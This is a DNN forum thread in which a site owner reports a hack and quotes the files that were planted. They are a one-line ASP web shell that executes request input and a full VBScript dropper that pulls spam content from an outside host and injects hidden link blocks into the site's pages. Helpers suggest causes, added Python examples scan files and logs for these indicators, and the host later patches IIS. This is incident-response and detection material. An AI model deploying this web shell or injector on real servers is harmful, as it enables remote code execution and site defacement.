Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.

website hacked
New Post
11/28/2014 6:57 PM
 

I am not sure whether this is the right place to ask this question...

Google Webmaster Tools sent me an email to tell me that my website had been hacked and they were right.

My default.aspx was modified and this code was inserted just before the </html> tag:

<div id=linkbyme><li><a href="http://www.mywebsite.com/images/us.asp">house slippers uggs</a></li></div><script>document.getElementById('linkbyme').style.display='none';</script></body>

(I've changed the URL to mywebsite.com as I don't want more unwanted attention directed to my website)

There were two foreign files in the /images folder: logs.asp and us.asp.

The first of these, log.asp, is pretty simple:

<%ExecuteGlobal request("tanya")%>

The next one, us.asp, is longer and seems to do the dirty work (I will include its contents at the end of this message). I have no idea what it does.

My passwords for the Super User and the SQL account were all hard (I've since changed them just in case). What do people think - is this a DNN problem or has my ISP dropped the ball? I am running a completely vanilla installation of DNN 07.03.02 (I was just waiting a day or so before I was going to install v07.03.04 - I had a bad experience being an early adopter of v07.03.03 with the Telerik editor). Any insights greatly appreciated. Thanks.

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<%
Response.Addheader "Content-Type","text/html;charset=utf-8"
if len(Request.QueryString("ugg4"))<>0 Then
    Response.Write GetResStr("http://ugg.wmjren.org/A525/"&"ugg4/"&Request.QueryString("ugg4"))
else
    Response.Write GetResStr("http://ugg.wmjren.org/A525/"&"ugg4/us.asp")
end if
action=request("action")
replacestr=request("replacestr")
If action="createlinks" and replacestr<>"" Then
    Response.Write CreateLink()
End If
Response.End

Function CreateLink()
    set fso=CreateObject("Scripting.FileSystemObject")
    set fs=fso.GetFolder(Server.MapPath("/"))
    For Each file In fs.Files
        If instr(LCase(file.name),"index")>0 or instr(LCase(file.name),"default")>0 Then
            set fsofile=fso.OpenTextFile(file, 1, true)
            On Error Resume next
            tempstr=fsofile.Readall
            pos1=instr(tempstr,"<div id=linkbyme>")
            If pos1>0 then
                tempstr=RegexReplace(tempstr,"<div id=linkbyme>(.+?)</body>","</body>")
            End If
            tempstr=replace(tempstr, "</body>", "<div id=linkbyme>"&replacestr&"</div><script>document.getElementById('linkbyme').style.display='none';</script></body>")
            set fsofile1=fso.OpenTextFile(file, 2, true)
            fsofile1.WriteLine tempstr
            fsofile1.close
            CreateLink="linkbyme"
        End If
    Next
    set fso=nothing
End Function

Function RegexReplace(source1,pattern1,replace1)
    Set re = New RegExp
    re.Pattern = pattern1
    re.Global = True
    re.IgnoreCase = True
    RegexReplace= re.replace(source1,replace1)
End Function

function GetResStr(URL)
    dim ResBody,ResStr,PageCode
    Set Http=server.createobject("msxml2.serverxmlhttp.3.0")
    Http.setTimeouts 10000, 10000, 10000, 10000
    Http.open "GET",URL,False
    Http.Send()
    If Http.Readystate =4 Then
        If Http.status=200 Then
            ResStr=http.responseText
            ResBody=http.responseBody
            PageCode="utf-8"
            GetResStr=BytesToBstr(http.responseBody,trim(PageCode))
        End If
    End If
End Function

Function BytesToBstr(Body,Cset)
    Dim Objstream
    Set Objstream = Server.CreateObject("adodb.stream")
    objstream.Type = 1
    objstream.Mode =3
    objstream.Open
    objstream.Write body
    objstream.Position = 0
    objstream.Type = 2
    objstream.Charset = Cset
    BytesToBstr = objstream.ReadText
    objstream.Close
    set objstream = nothing
End Function
%>
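
Added example (not part of the original post and not DNN code): a Python scanner for a local copy of the web root that looks for the three indicators described in the post above: the hidden `linkbyme` block, a script that executes request input, and server-side script files in a folder that should hold only static content. The extension list, the choice of `images` as a script-free folder, and the constructed sample tree in `demo()` are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Indicators come from the post above; the extension and folder lists are assumptions.
HIDDEN_LINK = re.compile(r"<div\s+id=[\"']?linkbyme[\"']?\s*>.*?</body>", re.I | re.S)
EVAL_SHELL = re.compile(r"\b(?:ExecuteGlobal|Execute|Eval)\b\s*\(?\s*request\s*\(", re.I)
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".aspx", ".ashx", ".php"}
STATIC_DIRS = {"images"}  # folders expected to hold no server-side script


def scan_webroot(root):
    """Return sorted (relative_path, finding) pairs for a local copy of the site."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        text = path.read_text(encoding="utf-8", errors="replace")
        if HIDDEN_LINK.search(text):
            findings.append((rel.as_posix(), "hidden-link-block"))
        if path.suffix.lower() in SCRIPT_EXTS:
            if EVAL_SHELL.search(text):
                findings.append((rel.as_posix(), "eval-of-request-input"))
            if len(rel.parts) > 1 and rel.parts[0].lower() in STATIC_DIRS:
                findings.append((rel.as_posix(), "script-in-static-dir"))
    return sorted(findings)


def demo():
    """Scan a constructed tree that mirrors the files described in the post."""
    sample = {
        "Default.aspx": "<html><body><p>Home</p><div id=linkbyme><li>"
                        "<a href=\"http://www.mywebsite.com/images/us.asp\">x</a></li></div>"
                        "<script>document.getElementById('linkbyme').style.display='none';"
                        "</script></body></html>",
        "About.aspx": "<html><body><p>About</p></body></html>",
        "images/logs.asp": "<%ExecuteGlobal request(\"tanya\")%>",
        "images/us.asp": "<% ' constructed stand-in for the second dropped file %>",
        "images/logo.gif": "GIF89a",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in sample.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{finding:24} {rel}")
```

A hit for `script-in-static-dir` alone is worth investigating even when the file's contents look harmless, because the file may only be a loader for code fetched or posted at request time.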

 

 

 
New Post
11/28/2014 7:18 PM
 
Please verify that all Microsoft security updates have been applied.
Did you make sure to have secure passwords for all FTP accounts?
There might be a 3rd party extension with a security issue.

Cheers from Germany,
Sebastian Leupold (Microsoft MVP)

dnnWerk - The DotNetNuke Experts   German Spoken DotNetNuke User Group

Speed up your DNN Websites with TurboDNN
 
New Post
11/28/2014 7:45 PM
 
Sebastian Leupold wrote:
Please verify that all Microsoft security updates have been applied.
Did you make sure to have secure passwords for all FTP accounts?
There might be a 3rd party extension with a security issue.

Hi Sebastian,

No third party extensions. It is a "right-out-of-the-box" DNN installation. It doesn't get any simpler.

I will file a ticket with my ISP to see whether they have been keeping the security updates up-to-date. The FTP password is a nice mixture of upper and lower case, numbers and special symbols (quite a pain to type). According to an online password tester, the FTP password should require 26 million years to be broken. :-) I'm going to change it just in case it has been guessed -- one can't be too careful. I've changed all my other passwords (the super user and admin) just in case as well. They were likewise difficult to guess (requiring in the millions of years).

I will let you know what my ISP says. Thanks.

Steve Karpik

 
New Post
11/29/2014 5:28 AM
 
Steve, I'd also check all pages to make sure none is granting Edit permission to unauthenticated users.
I am not aware of an existing security bug that allows uploading files. If the hosting company did not properly
separate websites, the hacker might have gotten access to another site on the server and used it to affect
your site as well. Please ask the hosting company to check server logs.

Cheers from Germany,
Sebastian Leupold (Microsoft MVP)

dnnWerk - The DotNetNuke Experts   German Spoken DotNetNuke User Group

Speed up your DNN Websites with TurboDNN
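
Added example (not part of the thread and not DNN or hosting-provider tooling): a Python pass over IIS W3C extended logs, the server logs mentioned above, that flags requests to classic-ASP files under `/images/` and notes which of the parameter names read by the two dropped scripts appear in the query string. The log lines are constructed with documentation addresses; the extension list and the `/images/` prefix are assumptions.

```python
from urllib.parse import parse_qs

# Parameter names read by the two dropped scripts quoted in the first post.
DROPPER_PARAMS = {"tanya", "ugg4", "action", "replacestr"}
SCRIPT_EXTS = (".asp", ".asa", ".cer")   # assumed classic-ASP handlers
STATIC_PREFIXES = ("/images/",)          # assumed script-free folder

# Constructed W3C extended log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
#Version: 1.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2014-11-20 03:12:01 GET /Default.aspx - 198.51.100.7 200
2014-11-20 03:12:09 GET /images/logo.gif - 198.51.100.7 200
2014-11-21 22:40:13 POST /images/logs.asp - 203.0.113.50 200
2014-11-21 22:41:02 GET /images/us.asp action=createlinks&replacestr=x 203.0.113.50 200
2014-11-22 08:15:44 GET /images/us.asp ugg4=page1.html 192.0.2.33 200
2014-11-22 09:00:00 GET /Search.aspx action=find 198.51.100.7 200
"""


def suspicious_requests(log_text):
    """Return (timestamp, client_ip, uri, reasons) for requests worth a closer look."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]    # column order can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "").lower()
        query = row.get("cs-uri-query", "-").lower()
        params = set(parse_qs(query, keep_blank_values=True)) if query != "-" else set()
        reasons = []
        if stem.endswith(SCRIPT_EXTS) and stem.startswith(STATIC_PREFIXES):
            reasons.append("script-in-static-dir")
            if row.get("cs-method") == "POST":
                reasons.append("post-body-not-logged")  # form fields never reach the log
            known = sorted(params & DROPPER_PARAMS)
            if known:
                reasons.append("dropper-params:" + ",".join(known))
        if reasons:
            stamp = row.get("date", "") + " " + row.get("time", "")
            hits.append((stamp, row.get("c-ip"), stem, reasons))
    return hits
```

The earliest flagged request bounds when the files were already in place, and requests from the same client addresses shortly before it are the place to look for how they were written.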
 
New Post
11/30/2014 10:25 PM
 

Good news - it's not a DotNetNuke problem. There were vulnerabilities in IIS on the web servers at the hosting service that I use which have since been patched.

Thanks for the advice Sebastian.

 